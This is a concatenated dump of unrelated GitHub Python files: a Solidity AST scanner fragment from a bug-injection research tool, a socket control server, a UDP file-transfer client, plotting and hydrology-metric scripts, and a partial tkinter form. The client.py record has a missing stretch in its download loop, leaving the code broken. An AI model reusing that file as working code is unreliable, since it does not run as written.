injectInfo[SRC_KEY]:\n\t\t\t\tinjectInfo[SRC_KEY].append(item)\n\t\t\telse:\n\t\t\t\tcontinue\n\t\t#5. 存储结果\n\t\tif injectInfo[SRC_KEY]:\n\t\t\tself.storeInjectInfo(injectInfo)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\n\tdef cleanComment(self, _code):\n\t\t#使用正则表达式捕捉单行和多行注释\n\t\tsingleLinePattern = re.compile(r\"(//)(.)+\")\t#提前编译,以提高速度\n\t\tmultipleLinePattern = re.compile(r\"(/\\*)(.)+?(\\*/)\")\n\t\t#记录注释的下标\n\t\tindexList = list()\n\t\tfor item in singleLinePattern.finditer(_code):\n\t\t\tindexList.append(item.span())\n\t\tfor item in multipleLinePattern.finditer(_code, re.S):\n\t\t\t#多行注释,要允许多行匹配\n\t\t\tindexList.append(item.span())\n\t\t#拼接新结果\n\t\tstartIndedx = 0\n\t\tnewCode = str()\n\t\tfor item in indexList:\n\t\t\tnewCode += _code[startIndedx: item[0]]\t#不包括item[0]\n\t\t\tstartIndedx = item[1] + 1 #加一的目的是不覆盖前序的尾巴\n\t\tnewCode += _code[startIndedx:]\n\t\treturn newCode\n\n\n\tdef storeInjectInfo(self, _injectInfo):\n\t\ttry:\n\t\t\t#保存信息\n\t\t\twith open(os.path.join(INJECT_INFO_PATH, self.filename.split(\".\")[0] + \".json\"), \"w\", encoding = \"utf-8\") as f:\n\t\t\t\tjson.dump(_injectInfo, f, indent = 1)\n\t\t\t#print(\"%s %s %s\" % (info, self.filename + \" target injected information...saved\", end))\n\t\texcept:\n\t\t\t#print(\"%s %s %s\" % (bad, self.filename + \" target injected information...failed\", end))\n\t\t\tpass\n\n\tdef findASTNode(self, _ast, _name, _value):\n\t\tif type(_ast) != list:\n\t\t\tqueue = [_ast]\n\t\tresult = list()\n\t\tliteralList = list()\n\t\twhile len(queue) > 0:\n\t\t\tdata = queue.pop()\n\t\t\tfor key in data:\n\t\t\t\tif key == _name and data[key] == _value:\n\t\t\t\t\tresult.append(data)\n\t\t\t\telif type(data[key]) == dict:\n\t\t\t\t\tqueue.append(data[key])\n\t\t\t\telif type(data[key]) == list:\n\t\t\t\t\tfor item in data[key]:\n\t\t\t\t\t\tif type(item) == dict:\n\t\t\t\t\t\t\tqueue.append(item)\n\t\treturn result\n\n\tdef findASTNodeAttr(self, _ast, _attr, _value):\n\t\texternalPattern = re.compile(r\"(\\b)(external)(\\b)\")\n\t\tif type(_ast) != list:\n\t\t\tqueue = [_ast]\n\t\tresult = list()\n\t\tliteralList = list()\n\t\twhile len(queue) > 0:\n\t\t\tdata = queue.pop()\n\t\t\tfor key in data:\n\t\t\t\ttry:\n\t\t\t\t\tif key == \"attributes\" and data[key][_attr] == _value:\n\t\t\t\t\t\t#获得其类型\n\t\t\t\t\t\tvarType = data[key][\"type\"]\n\t\t\t\t\t\t#其类型中不能有external属性\n\t\t\t\t\t\tif not externalPattern.search(varType):\n\t\t\t\t\t\t\tresult.append(data)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\telif type(data[key]) == dict:\n\t\t\t\t\t\tqueue.append(data[key])\n\t\t\t\t\telif type(data[key]) == list:\n\t\t\t\t\t\tfor item in data[key]:\n\t\t\t\t\t\t\tif type(item) == dict:\n\t\t\t\t\t\t\t\tqueue.append(item)\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontinue\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\t\treturn result\n\n\t#传入:657:17:0\n\t#传出:657, 674\n\tdef srcToPos(self, _src):\n\t\ttemp = _src.split(\":\")\n\t\treturn int(temp[0]), int(temp[0]) + int(temp[1])","repo_name":"xf97/HuangGai","sub_path":"src/contractExtractor/NonpublicVarAccessdByPublicFuncExtractor/judgeAst.py","file_name":"judgeAst.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"2071351417","text":"from sqlite3 import connect\nfrom .types import IPV4Connection\nimport socket\nimport threading\nfrom sys import exit\nfrom .types import ActionV1\n\nserver_thread = None\nstart_thread = None\ncontinue_serving = True\n\ndef new_conn(socket, callback_fn):\n global continue_serving\n while continue_serving:\n sock, address = socket.accept()\n actual_data = None\n try:\n data_len = int.from_bytes(sock.recv(4), \"little\")\n actual_data = sock.recv(data_len)\n except:\n continue\n \n if actual_data is not None:\n action = ActionV1(0,\"\",\"\",0.0)\n if action.decode_from(actual_data.decode(\"utf-8\")):\n callback_fn(action)\n\ndef start(connection, callback_fn):\n if not isinstance(connection, IPV4Connection):\n raise Exception(\"Connection must be an IPV4Connection\")\n\n global server_thread\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind((connection.address, connection.port))\n sock.listen(5)\n server_thread = threading.Thread(target=new_conn, args=(sock, callback_fn))\n server_thread.start()\n\ndef control_server_start(connection, callback_fn):\n global start_thread\n start_thread = threading.Thread(target=start, args=(connection, callback_fn))\n start_thread.start()\n \ndef control_server_stop():\n global continue_serving\n continue_serving = False\n try:\n server_thread.join()\n start_thread.join()\n except:\n exit(0)\n","repo_name":"monolith-network/pycrate","sub_path":"pycrate/control_server.py","file_name":"control_server.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2972033442","text":"#Mehmet Salih ÇELİK - 170401073\r\nimport socket\r\nimport os\r\nimport sys\r\nimport time\r\n\r\nsunucu_port=42\r\nbuffer=32768\r\n#buffer boyutum 32KB\r\nistemci_socket=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\r\nistemci_socket.settimeout(3)\r\n#baglanti kontrolu icin sure 3 saniye\r\n\r\n\r\n\r\ndef decode_yap(x):\r\n return x.decode(\"utf-8\")\r\n\r\ndef encode_yap(x):\r\n return x.encode(\"utf-8\")\r\n\r\n\r\n###Sunucu baglantisi ve sunucu_dosyalari klasorunu ekrana yazdirma islemi\r\nwhile 1:\r\n sunucu_ip=str(input(\"Baglanilmak istenen sunucu ip sini giriniz : \"))\r\n sunucu = (sunucu_ip, sunucu_port)\r\n mesaj=\"\"\r\n mesaj=encode_yap(sunucu_ip)\r\n try:\r\n istemci_socket.sendto(mesaj,sunucu)\r\n yenimesaj,sunucu_ip=istemci_socket.recvfrom(buffer)\r\n yenimesaj=decode_yap(yenimesaj)\r\n except:\r\n print(\"Hatali ip girisi yapildi veya sunucudan yanit alinamiyor.\")\r\n a=str(input(\"Yeniden denemek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a==\"1\":\r\n continue\r\n else:\r\n break\r\n\r\n print(\"BAGLANTI BASARILI \\n\")\r\n print(yenimesaj)\r\n sunucudaki_dosyalar=yenimesaj\r\n istemcideki_dosyalar=os.listdir(\"istemci_dosyalari\")\r\n\r\n### Burada kullanici dogru komut girmis mi veya dogru dosya adi girmis mi kontrolu yapiyorum.\r\n mesaj = str(input(\"--- Yapilmak istenen islemi, dosya ismini ve uzantisini yaziniz.(GET abc.jpg , PUT xyz.txt) --- \\n\"))\r\n if mesaj[:3] != \"GET\" and mesaj[:3] != \"PUT\":\r\n print(\"Yanlis komut kullandiniz...\")\r\n a = str(input(\"Menuye donmek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a == \"1\":\r\n mesaj = encode_yap(\"1\")\r\n istemci_socket.sendto(mesaj, sunucu)\r\n continue\r\n else:\r\n mesaj=encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj, sunucu)\r\n break\r\n elif mesaj[:3]==\"GET\" and mesaj[4:] in sunucudaki_dosyalar:\r\n mesaj2 = encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj2, sunucu)\r\n\r\n elif mesaj[:3]==\"PUT\" and mesaj[4:] in istemcideki_dosyalar:\r\n mesaj2 = encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj2, sunucu)\r\n else:\r\n print(\"Olmayan bir dosya adi girdiniz...\")\r\n a = str(input(\"Menuye donmek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a == \"1\":\r\n mesaj = encode_yap(\"1\")\r\n istemci_socket.sendto(mesaj, sunucu)\r\n continue\r\n else:\r\n mesaj=encode_yap(mesaj)\r\n istemci_socket.sendto(mesaj, sunucu)\r\n break\r\n\r\n###Sunucudan dosya boyutunu mesaj olarak alıyoruz.Dosya boyutu kadar byte'ı indirme islemi yapıyoruz ve aynı isimde bir dosya olusturup byte'ları yazıyoruz.\r\n if mesaj[:3]==\"GET\":\r\n veri, sunucu_ip = istemci_socket.recvfrom(buffer)\r\n dosya_boyutu=decode_yap(veri)\r\n print(\"indirilecek dosya boyutu : \",dosya_boyutu,\"byte\")\r\n f = open(\"istemci_dosyalari/\"+mesaj[4:], \"wb\")\r\n boyut_kontrol = 0\r\n while True:\r\n if ((boyut_kontrol*buffer)= int(dosya_boyutu):\r\n print(\"YOLLANDI.\")\r\n f.close()\r\n\r\n a = str(input(\"Menuye donmek icin 1 , cikmak icin herhangi bir tusa basin : \"))\r\n if a == \"1\":\r\n continue\r\n else:\r\n break\r\n\r\n\r\n\r\nistemci_socket.close()","repo_name":"nyucel/blm304","sub_path":"vize/170401073/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4994,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"39087524303","text":"import csv_temperature\nfrom matplotlib import pyplot as plt\n\n\ndef plot_temperature(highs_temp, lows_temp, dates, unit):\n # Plotting the data\n fig = plt.figure(dpi=128, figsize=(10, 6))\n plt.plot(dates, highs_temp, c='red', alpha=0.5)\n plt.plot(dates, lows_temp, c='blue', alpha=0.5)\n plt.fill_between(dates, highs_temp, lows_temp, facecolor='green', alpha=0.1)\n # Formatating the chart\n plt.title('Daily high and low temperatures', fontsize=16)\n plt.xlabel('', fontsize=14)\n fig.autofmt_xdate()\n plt.ylabel('Temperature (°{})'.format(unit.title()), fontsize=12)\n plt.tick_params(axis='both', labelsize=10)\n plt.xlim(dates[0], dates[-1])\n plt.grid()\n plt.show()\n\n\ndef subplot_temp(filename1, filename2, unit):\n if unit.title() == 'C':\n dates1, highs1, lows1 = csv_temperature.convert_temperature(filename1)\n dates2, highs2, lows2 = csv_temperature.convert_temperature(filename2)\n limy = (-13, 50)\n if unit.title() == 'F':\n dates1, highs1, lows1 = csv_temperature.get_highs_lows(filename1)\n dates2, highs2, lows2 = csv_temperature.get_highs_lows(filename2)\n limy = (10, 120)\n fig = plt.figure(dpi=128, figsize=(10, 6))\n\n ax1 = plt.subplot(211)\n plt.plot(dates1, highs1, c='red', alpha=0.5)\n plt.plot(dates1, lows1, c='blue', alpha=0.5)\n plt.fill_between(dates1, highs1, lows1, facecolor='green', alpha=0.1)\n plt.setp(ax1.get_xticklabels(), visible=False)\n plt.title('Daily high and low temperatures Sitka - 2014', fontsize=16)\n fig.autofmt_xdate()\n plt.ylabel('Temperature (°{})'.format(unit.title()), fontsize=12)\n plt.tick_params(axis='both', labelsize=10)\n plt.xlim(dates1[0], dates1[-1])\n plt.ylim(limy)\n plt.grid()\n\n ax2 = plt.subplot(212, sharex=ax1)\n plt.plot(dates2, highs2, c='red', alpha=0.5)\n plt.plot(dates2, lows2, c='blue', alpha=0.5)\n plt.fill_between(dates2, highs2, lows2, facecolor='green', alpha=0.1)\n plt.setp(ax1.get_xticklabels(), fontsize=14)\n plt.title('Daily high and low temperatures Death Valley - 2014', fontsize=16)\n fig.autofmt_xdate()\n plt.ylabel('Temperature (°{})'.format(unit.title()), fontsize=12)\n plt.tick_params(axis='both', labelsize=10)\n plt.xlim(dates2[0], dates2[-1])\n plt.ylim(limy)\n plt.grid()\n\n plt.show()\n","repo_name":"gabriel19913/cvs_temperature_plotting","sub_path":"temperature_plot.py","file_name":"temperature_plot.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15443900943","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport uncertainties.unumpy as unp\nfrom uncertainties import ufloat\nfrom scipy.optimize import curve_fit\nfrom texutils.table import TexTable\n\n\n#theta_P ist der polarisationswinkel\ntheta_P, U_max, U_min = np.genfromtxt('data/kontrast.txt', unpack=True)\n\n#damit in radiant\ntheta_P = theta_P / 360 * (2*np.pi) \n\nZ = U_max-U_min\nN = U_max+U_min\n\n\ndef Fitf(theta, a, b, c, d):\n return np.abs(a*np.sin(b*theta + c)) + d\n\n\nKontr = Z/N\n\nparams, cov = curve_fit(Fitf, theta_P, Kontr, )\nerrors = np.sqrt(np.diag(cov))\na = ufloat(params[0], errors[0])\nb = ufloat(params[1], errors[1])\nc = ufloat(params[2], errors[2])\nd = ufloat(params[3], errors[3])\n\n\nx = np.linspace(-0.4, 3.5, 1000)\n\ntheta = (np.pi/2 - c)/b\n\nprint('jetzt kommen die fitparameter')\nprint(a)\nprint(b)\nprint(c)\nprint(d,'\\n')\n\nprint('---------------')\nprint(theta * 360 / (2 * np.pi))\nprint('das ist der beste winkel mit dem größsten kontrast')\nprint('den wir im experiment haben. wir haben 130° genommen.')\nprint('da wir das am anfang nicht ausgerechnet haben')\n\nplt.plot(theta_P, Kontr, 'r+', label=\"Daten\")\nplt.plot(x, Fitf(x, *params), 'b', label=\"Regression\")\nplt.xlabel(r\"$\\theta_P \\, / \\, \\mathrm{rad}$\")\nplt.ylabel('K')\nplt.xticks([0, 0.5*np.pi, np.pi], ['0', r'$\\frac{\\pi}{2}$', r'$\\pi$'])\nplt.xlim(-0.4, 3.5)\nplt.ylim(0, 1)\nplt.tight_layout()\nplt.legend(loc=\"best\")\nplt.savefig(\"build/Kontrast.pdf\")\nplt.clf()\n\n\n##########\n# Tabelle\n##########\nwinkel, umax ,umin, kontrast = np.genfromtxt('data/gesicherte_messwerte/kontrast_(Kopie).txt',unpack = True)\n\nprint('-------------')\nt = TexTable([winkel, umax,umin,kontrast], [r\"Winkel / $°$\", r\"$U_\\text{max}$ / mV\",r\"$U_\\text{min}$/ mv\",r\"Kontrast\"], \n label='tab:Kontrast',\n caption='Messwerte der unterschiedlichen Spannungen.')\nt.set_row_rounding(0, 0) #reihe und rundung\nt.set_row_rounding(1, 0)\nt.set_row_rounding(2, 0)\nt.set_row_rounding(3, 4)\n\nt.write_file('build/tabKontrast.tex')\nprint('Die Tabelle des Kontrastes wurde erzeugt!\\n')","repo_name":"smrakais/Master-Praktikum","sub_path":"v64/kontrast.py","file_name":"kontrast.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23699298519","text":"import warnings\n\nfrom .core import MetaRegister\n\ndef analyze_node(node):\n tagname = node.tag[0].upper() + node.tag[1:]\n try:\n tagclass = MetaRegister.registry[tagname]\n except KeyError:\n warnings.warn('{0} is not implemented'.format(tagname))\n return\n return tagclass(node)\n","repo_name":"saltduck/pyBPMN","sub_path":"bpmn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"2078689918","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom src.h_index import get_h_index\n\ndef get_event_matrix(Events, data_P, data_full):\n h = get_h_index(Events) # calc h index\n discharge_DF = get_discharge_metrics(Events, data_full) # Calc discharge related metrics\n turb_DF = get_turb_metrics(Events)\n load_DF = get_load_metrics(Events, data_full)\n rainfall_DF = get_rainfall_metrics(data_P, discharge_DF) # discharge_DF provides the events (times)\n Full_featuresDF = h.join(discharge_DF).join(turb_DF).join(load_DF).join(rainfall_DF)\n\n # Remove unused columns\n Full_featuresDF.drop(labels = [('Q_Event','TimePeakQ'),('Q_Event','TimePeakQf'), ('Q_Event','TimeStartQ'), ('T_Event','TimePeakT')], axis = 1, inplace = True)\n \n return Full_featuresDF\n\n\ndef get_discharge_metrics(data, data_full):\n EventDF = data.groupby('Event_ID')['Qcms'].max().rename('peakFlow').to_frame().join( #add peakFlow\n data.groupby('Event_ID')['Qcms'].idxmax().rename('TimePeakQ')).join( # add time of peak flow\n data.groupby('Event_ID')['Q_qf'].idxmax().rename('TimePeakQf')).join(# add time of peak quick flow\n data.reset_index().groupby('Event_ID')['Date'].first().rename('TimeStartQ'))# add starting time\n start_flow = data.groupby('Event_ID')['Qcms'].first() \n EventDF['Hours2Peak'] = [t.total_seconds()/3600 for t in EventDF['TimePeakQ'].subtract(EventDF['TimeStartQ'])] # add time to peak\n EventDF['DeltaQ'] = EventDF['peakFlow'] - start_flow \n\n # Quick Flow and base flow params:\n EventDF = EventDF.join(data.groupby('Event_ID').apply(dischargeStats, \n colQ = 'Qcms',\n colBF = 'Q_bf',\n colT = 'combinedTurb',\n col_load = 'load_mgs',\n max_nan = 1 # nan values already checked\n ).droplevel(1,axis = 0))\n EventDF.columns = pd.MultiIndex.from_product([['Q_Event'],EventDF.columns]) # add second column index\n\n\n # Discharge antecedent features\n AntecedentDF = data.groupby('Event_ID')['Qcms'].first().rename('startFlow').to_frame()\n cum_disch = pd.DataFrame()\n cum_disch['cum_Qcm_10D'] = data_full.Qcms.multiply(60*15).rolling('10D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_15D'] = data_full.Qcms.multiply(60*15).rolling('15D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_20D'] = data_full.Qcms.multiply(60*15).rolling('20D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_25D'] = data_full.Qcms.multiply(60*15).rolling('25D', min_periods= round(24*4*0.9)).sum()\n cum_disch['cum_Qcm_30D'] = data_full.Qcms.multiply(60*15).rolling('30D', min_periods= round(24*4*0.9)).sum()\n\n AntecedentDF = AntecedentDF.join( cum_disch.loc[EventDF[('Q_Event','TimeStartQ')],:].set_index(EventDF.index) )\n AntecedentDF.columns = pd.MultiIndex.from_product([['Q_Antecedent'],AntecedentDF.columns]) # add second column index\n\n Discharge_DF = EventDF.join(AntecedentDF)\n\n return Discharge_DF\n\ndef get_turb_metrics(data):\n # TurbDF = data.groupby('Event_ID')['combinedTurb'].agg(peakTurb = 'max', meanTurb = 'mean') # peak and mean turbidity\n TurbDF = data.groupby('Event_ID').apply(turbStats \n , colQ = 'Qcms'\n , colBF = 'Q_bf'\n , colT = 'combinedTurb'\n , col_load = 'load_mgs'\n , max_nan = 1 # nan values already checked\n ).droplevel(1, axis = 0)\n\n TurbDF['TimePeakT'] = data.groupby('Event_ID')['combinedTurb'].idxmax().rename('TimePeakT') # time at peak T\n TurbDF['QatTpeak'] = data.loc[TurbDF['TimePeakT'],'Qcms'].to_frame().set_index(TurbDF.index) # Q at peak T\n \n TurbDF.columns = pd.MultiIndex.from_product([['T_Event'],TurbDF.columns])\n\n return TurbDF\n\ndef get_rainfall_metrics(data_P, Discharge_DF):\n #reference time for P metrics:\n hours_after_Q_peak = 4 #end of event for P event-related mmetrics\n days_before_start = 1 # start of event for P antecedent-related metrics\n\n # Event and antecedent Parameters in the Precip dataframe: \n # Event-related Accumulated P \n data_P['P_10h_acum'] = data_P.precip.rolling(10 + hours_after_Q_peak, min_periods=round(10 * 0.9)).sum()\n data_P['P_11h_acum'] = data_P.precip.rolling(11 + hours_after_Q_peak, min_periods=round(11 * 0.9)).sum()\n data_P['P_12h_acum'] = data_P.precip.rolling(12 + hours_after_Q_peak, min_periods=round(12 * 0.9)).sum()\n data_P['P_13h_acum'] = data_P.precip.rolling(13 + hours_after_Q_peak, min_periods=round(13 * 0.9)).sum()\n data_P['P_14h_acum'] = data_P.precip.rolling(14 + hours_after_Q_peak, min_periods=round(14 * 0.9)).sum()\n data_P['P_15h_acum'] = data_P.precip.rolling(15 + hours_after_Q_peak, min_periods=round(15 * 0.9)).sum()\n\n # Event-related Intensity\n data_P['P_12h_max_i'] = data_P.precip.rolling('12H').max() #Max intensity value in the period\n data_P['P_15h_max_i'] = data_P.precip.rolling('15H').max() #Max intensity value in the period\n data_P['P_12h_mean_i'] = data_P.precip.replace({0:np.nan}).rolling('12H').mean().replace({np.nan:0}) #mean intensity when rain !=0\n data_P['P_15h_mean_i'] = data_P.precip.replace({0:np.nan}).rolling('15H').mean().replace({np.nan:0}) #mean intensity when rain !=0\n\n # dates to sample P metrics:\n relevant_dates_event = [t.ceil('H') + datetime.timedelta(hours = hours_after_Q_peak) for t in Discharge_DF[('Q_Event','TimePeakQ')]]\n # relevant_dates = [t.ceil('H') for t in DF_h['StartTimeQ']] \n\n P_event_DF = data_P.loc[relevant_dates_event].drop(['HourlyPrecipitation','TFlag','precip','sFlag','missFlag'],axis=1).set_index(Discharge_DF.index)\n P_event_DF.columns = pd.MultiIndex.from_product([['P_event'],P_event_DF.columns])\n\n\n # Antecedent P\n anteced_P = pd.DataFrame()\n\n anteced_P['P_50d_acum'] = data_P.precip.rolling('50D', min_periods= round(50*24 * 0.9)).sum()\n anteced_P['P_40d_acum'] = data_P.precip.rolling('40D', min_periods = round(40*24 * 0.9)).sum()\n anteced_P['P_30d_acum'] = data_P.precip.rolling('30D', min_periods = round(30*24 * 0.9)).sum()\n anteced_P['P_25d_acum'] = data_P.precip.rolling('25D', min_periods = round(25*24 * 0.9)).sum()\n anteced_P['P_20d_acum'] = data_P.precip.rolling('20D', min_periods = round(20*24 * 0.9)).sum()\n\n # dates to sample P antecedent metrics:\n relevant_dates_anteced = [t.ceil('H') - datetime.timedelta(days = days_before_start) for t in Discharge_DF[('Q_Event','TimeStartQ')]]\n\n\n P_antec_DF = anteced_P.loc[relevant_dates_anteced].set_index(Discharge_DF.index)\n P_antec_DF.columns = pd.MultiIndex.from_product([['P_antec'],P_antec_DF.columns])\n\n P_DF= P_event_DF.join(P_antec_DF)\n \n return P_DF\n\ndef get_load_metrics(data, data_full):\n Event_time_start = data.reset_index().groupby('Event_ID')['Date'].first().rename('TimeStartQ')\n\n load_df = data.groupby('Event_ID').apply(loadStats \n , colQ = 'Qcms'\n , colBF = 'Q_bf'\n , colT = 'combinedTurb'\n , col_load = 'load_mgs'\n , max_nan = 1 # nan values already checked\n ).droplevel(1, axis = 0)\n\n load_df.columns = pd.MultiIndex.from_product([['Load_Event'],load_df.columns])\n\n #Antecedent Conditions\n # Antecedent conditions\n load = pd.DataFrame()\n load['load_15D'] = data_full.load_mgs.multiply(60*15).rolling('15D', min_periods= round(24*4*0.9)).sum()\n load['load_20D'] = data_full.load_mgs.multiply(60*15).rolling('20D', min_periods= round(24*4*0.9)).sum()\n load['load_25D'] = data_full.load_mgs.multiply(60*15).rolling('25D', min_periods= round(24*4*0.9)).sum()\n load['load_30D'] = data_full.load_mgs.multiply(60*15).rolling('30D', min_periods= round(24*4*0.9)).sum()\n load['load_40D'] = data_full.load_mgs.multiply(60*15).rolling('40D', min_periods= round(24*4*0.9)).sum()\n\n load_antec = load.loc[Event_time_start,:].set_index(Event_time_start.index)\n\n load_antec.columns = pd.MultiIndex.from_product([['Load_antec'],load_antec.columns])\n\n load_df = load_df.join(load_antec)\n\n return load_df\n\ndef dischargeStats(df,colQ, colBF, colT, col_load, max_nan = 0.1):\n full_len = len(df)\n filtDF = df[[colQ, colBF, colT, col_load]].dropna() #filter over all discharge and load variables for consistency in metrics\n newlen = len(filtDF)\n \n filtDF['qf'] = filtDF[colQ] - filtDF[colBF]\n out_df = pd.DataFrame({\n # total discharge params\n 'meanFlow':[filtDF[colQ].mean()],\n 'totFlow': [filtDF[colQ].sum()*(60*15)],\n # Quick Flow params\n 'cum_qf': [filtDF['qf'].sum()*(60*15)],\n 'mean_qf': [filtDF['qf'].mean()],\n 'max_qf': [filtDF['qf'].max()],\n #Base flow params\n 'cum_bf': [filtDF[colBF].sum()*(60*15)],\n 'mean_bf': [filtDF[colBF].mean()],\n 'max_bf': [filtDF[colBF].max()],\n })\n out_df['bf_qf_ratio']= out_df['cum_bf']/out_df['cum_qf']\n out_df['bf_qf_peak_ratio'] = out_df['max_bf']/out_df['max_qf']\n out_df['Tf_qf_ratio']= out_df['totFlow']/out_df['cum_qf']\n out_df['Tf_qf_peak_ratio'] = filtDF[colQ].max()/out_df['max_qf']\n out_df['Tf_bf_ratio']= out_df['totFlow']/out_df['cum_bf']\n out_df['Tf_bf_peak_ratio'] = filtDF[colQ].max()/out_df['max_bf']\n \n if full_len-newlen > max_nan*full_len:\n out_df.loc[:] = np.nan\n return out_df\n \ndef loadStats(df,colQ, colBF, colT, col_load, max_nan = 0.1):\n full_len = len(df)\n filtDF = df[[colQ, colBF, colT, col_load]].dropna() #filter over all discharge and load variables for consistency in metrics\n newlen = len(filtDF)\n out_df = pd.DataFrame({\n #Load params\n 'maxLoad': [filtDF[col_load].max()],\n 'totalLoad': [filtDF[col_load].sum()],\n 'meanLoad': [filtDF[col_load].mean()],\n })\n \n if full_len-newlen > max_nan*full_len:\n out_df.loc[:] = np.nan\n \n return out_df\n \ndef turbStats(df,colQ, colBF, colT, col_load, max_nan = 0.1):\n full_len = len(df)\n filtDF = df[[colQ, colBF, colT, col_load]].dropna() #filter over all discharge and load variables for consistency in metrics\n newlen = len(filtDF)\n out_df = pd.DataFrame({\n #turb params\n 'peakTurb': [filtDF[colT].max()],\n 'meanTurb': [filtDF[colT].mean()],\n })\n \n if full_len-newlen > max_nan*full_len:\n out_df.loc[:] = np.nan\n \n return out_df","repo_name":"ArlexMR/Hysteresis-Analysis","sub_path":"src/event_metrics.py","file_name":"event_metrics.py","file_ext":"py","file_size_in_byte":11299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20640668986","text":"import numpy as np\nfrom scipy import optimize\nimport matplotlib.pyplot as pl\n\ndef func(x, p):\n \"\"\"\n 数据拟合所用的函数:A*sin(2*pi*k*x + theta)\n \"\"\"\n A, k, theta = p\n return A*np.sin(2*np.pi*k*x + theta)\n\ndef residuals(p, y, x):\n \"\"\"\n 实验数据x,y 和拟合函数之间的差, p为拟合需要找到的系数\n \"\"\"\n return y - func(x, p)\n\nx = np.linspace(0, 2*np.pi, 100)\nA, k, theta = 10, 0.34, np.pi/6#真实数据的函数参数\ny0 = func(x, [A, k, theta])#真实数据\n#加入噪声之后的实验数据\nnp.random.seed(0)\ny1 = y0 + 2 * np.random.randn(len(x))\n\np0 = [7, 0.40, 0] #第一次猜测的函数拟合参数\n\n#调用leastsq进行数据拟合\n#residuals为计算误差的函数\n#P0为拟合的实验数据\n#args 为需要拟合的实验数据\n\nplsq = optimize.leastsq(residuals, p0, args=(y1, x))\n\nprint(u\"真实参数:\", [A, k, theta])\nprint(u\"拟合参数:\", plsq[0])#实验数据拟合后的参数\n\npl.plot(x, y1, \"o\", label=u\"带噪声的实验数据\")\n\npl.plot(x, y0, label=u\"真实数据\")\npl.plot(x, func(x, plsq[0]), label=u\"拟合数据\")\npl.legend()\npl.show()\n","repo_name":"wanglongjuan/wlj-study","sub_path":"python-example/nihe2.py","file_name":"nihe2.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3318720735","text":"# Copyright (C) 2018 Dan Tran\r\n\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n\r\n# You should have received a copy of the GNU General Public License along\r\n# with this program; if not, write to the Free Software Foundation, Inc.,\r\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\r\n\r\nimport numpy as np\r\n\r\ndef J(X, y, w, b, l):\r\n j = 0.0\r\n for i in range(X.shape[0]):\r\n j += np.log(1.0 + np.exp(-y[i] * (b + np.dot(X[i], w))))\r\n return j / float(X.shape[0]) + l * np.linalg.norm(w, 2)\r\n\r\ndef error(X, y, w, b):\r\n err = 0.0\r\n for i in range(X.shape[0]):\r\n if np.sign(b + np.dot(X[i], w)) != y[i]:\r\n err += 1.0\r\n return err / float(X.shape[0])\r\n","repo_name":"Dan-Tran/congress_classifier","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29276074705","text":"import tkinter \nimport sqlite3 \n\nclass EnterPartPage(tkinter.Frame):\n\n parts_ID_entry = None\n parts_ID_field = None\n peripheral_type_entry = None\n peripheral_type_field = None\n\n def __init__(self, parent, controller):\n \"\"\" \n Constructs a new page.\n\n - parent : the parent class\n - controller : the application\n \"\"\"\n tkinter.Frame.__init__(self, parent)\n self.controller = controller # for switching between pages\n self.populate_window(controller)\n\n def populate_window(self, controller):\n \"\"\" \n Populates the page with elements and attributes.\n\n - controller : the application\n \"\"\"\n self.create_header(controller, 'Enter computer peripheral information')\n self.create_fields()\n self.create_buttons(controller)\n\n ############################### PAGE PROPERTIES ############################### \n\n def create_header(self, controller, header):\n \"\"\" \n Creates a header for the current page.\n \n - controller : the application\n - header : contents of the header\n \"\"\"\n label = tkinter.Label(self, text=header, font=controller.header_font)\n label.pack(side='top', fill='x', pady=20)\n\n def create_fields(self):\n \"\"\" \n Create fields for requesting user input \n \"\"\"\n # label and field for model number\n parts_ID_label = tkinter.Label(self, text='Parts ID', font=('Helvetica', 14))\n parts_ID_label.pack()\n self.parts_ID_entry = tkinter.StringVar()\n 